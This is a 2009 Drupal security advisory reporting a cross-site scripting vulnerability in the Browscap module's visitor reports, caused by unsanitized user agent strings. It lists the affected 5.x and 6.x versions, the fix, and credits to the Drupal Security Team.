• Advisory ID: DRUPAL-SA-CONTRIB-2009-065
  • Project: Browscap (third-party module)
  • Version: 5.x, 6.x
  • Date: 2009-September-30
  • Security risk: Critical
  • Exploitable from: Remote
  • Vulnerability: Cross Site Scripting

Description

The Browscap module provides a way to identify the visitors to your site based on the user agent in their browser. It can also record these user agent strings and provide reports about them. When displaying reports about visitors, the module does not properly sanitize the user agent strings before display, leading to a cross-site scripting (XSS) vulnerability. Such an attack may lead to a malicious user gaining full administrative access. Mitigating factors: this only impacts sites which use the "Monitor browsers" feature.

Versions affected

  • Browscap versions 6.x prior to 6.x-1.1
  • Browscap versions 5.x prior to 5.x-1.1

Drupal core is not affected. If you do not use the contributed Browscap module, there is nothing you need to do.

Solution

Install the latest version:

See also the Browscap module project page.

Reported by

Greg Knaddison of the Drupal Security Team

Fixed by

Greg Knaddison of the Drupal Security Team with help from Rob Loach and Mike Ryan and Dave Reid of the Drupal Security Team.

Contact

The security team for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact.